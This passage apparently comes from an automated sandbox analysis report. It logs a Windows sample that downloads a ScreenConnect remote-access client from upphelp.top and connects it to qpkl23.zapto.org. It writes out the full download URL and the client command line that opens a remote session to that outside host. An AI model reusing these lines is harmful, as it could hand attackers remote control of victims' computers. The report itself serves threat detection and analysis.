      "C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=3b776ead-f4ad-41e1-88d0-71a737ecbd10&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1004
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 836
  2⤵
  - Program crash
  PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2152 -ip 2152
1⤵
PID:1232

C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe
"C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=3b776ead-f4ad-41e1-88d0-71a737ecbd10&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
1⤵
- Sets service image path in registry
- Drops file in System32 directory
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464
- C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
  "C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe" "RunRole" "4d9067e0-5a30-46d7-a755-11b764bcf3f7" "User"
  2⤵
  - Drops file in System32 directory
  - Executes dropped EXE
  PID:2720

Network

DNS

upphelp.top

dfsvc.exe

Remote address:

8.8.8.8:53

Request

upphelp.top

IN A

Response

upphelp.top

IN A

79.110.49.196
GET

https://upphelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=3b776ead-f4ad-41e1-88d0-71a737ecbd10&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=3b776ead-f4ad-41e1-88d0-71a737ecbd10&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 53262
Content-Type: application/x-ms-application; charset=utf-8
Content-Encoding: gzip
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:19 GMT
GET

https://upphelp.top/Bin/ScreenConnect.Client.manifest

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 6227
Content-Type: text/html
Content-Encoding: gzip
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:31 GMT
GET

https://upphelp.top/Bin/ScreenConnect.ClientService.exe

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 95520
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:31 GMT
GET

https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 61216
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:32 GMT
GET

https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:32 GMT
GET

https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe.config

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:32 GMT
GET

https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 266
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:32 GMT
GET

https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 81696
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:32 GMT
GET

https://upphelp.top/Bin/ScreenConnect.Client.dll

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.Client.dll HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 98969
Content-Type: text/html
Content-Encoding: gzip
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:32 GMT
GET

https://upphelp.top/Bin/ScreenConnect.ClientService.dll

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 31931
Content-Type: text/html
Content-Encoding: gzip
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:34 GMT
GET

https://upphelp.top/Bin/ScreenConnect.Windows.dll

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 845337
Content-Type: text/html
Content-Encoding: gzip
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:34 GMT
GET

https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 601376
Content-Type: text/html
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:35 GMT
GET

https://upphelp.top/Bin/ScreenConnect.Core.dll

dfsvc.exe

Remote address:

79.110.49.196:443

Request

GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: upphelp.top
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Length: 220392
Content-Type: text/html
Content-Encoding: gzip
Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
Date: Mon, 14 Oct 2024 14:24:38 GMT
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A
DNS

74.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.32.126.40.in-addr.arpa

IN PTR

Response
DNS

196.49.110.79.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.49.110.79.in-addr.arpa

IN PTR

Response
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=31C63020B2BD675F140A2538B37F6601; domain=.bing.com; expires=Sat, 08-Nov-2025 14:23:43 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4E13CA4CCC8E4EB68F9287DAE7A9EC92 Ref B: LON601060105054 Ref C: 2024-10-14T14:23:43Z
date: Mon, 14 Oct 2024 14:23:43 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=31C63020B2BD675F140A2538B37F6601

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=1ZuG1_3JjmMEUNzsPy4x_BC9_1meqV8gz2ZCndFQQp4; domain=.bing.com; expires=Sat, 08-Nov-2025 14:23:44 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9C37CC56C01448C8B3B0F3002BA716F6 Ref B: LON601060105054 Ref C: 2024-10-14T14:23:44Z
date: Mon, 14 Oct 2024 14:23:43 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid=

Remote address:

150.171.28.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=a2d349e4c4a54727a4bab141287b077d&localId=w:B1F9B991-31A2-6777-EDEA-FA7B5FB14F41&deviceId=6825841072347551&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=31C63020B2BD675F140A2538B37F6601; MSPTC=1ZuG1_3JjmMEUNzsPy4x_BC9_1meqV8gz2ZCndFQQp4

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A3AB6CD8BCDD48248F6D589363B38696 Ref B: LON601060105054 Ref C: 2024-10-14T14:23:52Z
date: Mon, 14 Oct 2024 14:23:52 GMT
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

75.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.117.19.2.in-addr.arpa

IN PTR

Response

75.117.19.2.in-addr.arpa

IN PTR

a2-19-117-75deploystaticakamaitechnologiescom
DNS

qpkl23.zapto.org

ScreenConnect.ClientService.exe

Remote address:

8.8.8.8:53

Request

qpkl23.zapto.org

IN A

Response

qpkl23.zapto.org

IN A

79.110.49.196
DNS

29.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.243.111.52.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360504960_1PLAHYZB4JQO28JRC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360504960_1PLAHYZB4JQO28JRC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 604398
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EEF7676448674773BB7E6744F9AB5A35 Ref B: LON601060103040 Ref C: 2024-10-14T14:25:17Z
date: Mon, 14 Oct 2024 14:25:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388115_1OIS3ERNXZ6FC49JX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239339388115_1OIS3ERNXZ6FC49JX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 504006
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7E62847F51294477B866267F9EA5875C Ref B: LON601060103040 Ref C: 2024-10-14T14:25:17Z
date: Mon, 14 Oct 2024 14:25:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418596_1ZW2YDLAK01V77NJD&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239340418596_1ZW2YDLAK01V77NJD&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 540156
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: AD4BB90534EC435B870FD5BCD39A0027 Ref B: LON601060103040 Ref C: 2024-10-14T14:25:17Z
date: Mon, 14 Oct 2024 14:25:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418595_19TRV8HP5YIGTZD3I&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239340418595_19TRV8HP5YIGTZD3I&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 474395
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6100B0C9365642E9820D3881ABAA2B8E Ref B: LON601060103040 Ref C: 2024-10-14T14:25:17Z
date: Mon, 14 Oct 2024 14:25:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339388116_1HBZ24TGK6VST5MLJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239339388116_1HBZ24TGK6VST5MLJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 787151
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8001210A7D704950BD715F0D48D70F9D Ref B: LON601060103040 Ref C: 2024-10-14T14:25:17Z
date: Mon, 14 Oct 2024 14:25:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360505011_123FH55PMWQ5EA6JP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.27.10:443

Request

GET /th?id=OADD2.10239360505011_123FH55PMWQ5EA6JP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 356644
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CE2B93AF6B7B4FF88598D0395885A70B Ref B: LON601060103040 Ref C: 2024-10-14T14:25:18Z
date: Mon, 14 Oct 2024 14:25:18 GMT
DNS

10.27.171.150.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.27.171.150.in-addr.arpa

IN PTR

Response

79.110.49.196:443

https://upphelp.top/Bin/ScreenConnect.Core.dll

tls, http

dfsvc.exe

43.1kB
2.2MB
850
1580

HTTP Request

GET https://upphelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=3b776ead-f4ad-41e1-88d0-71a737ecbd10&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session

HTTP Response

200

HTTP Request

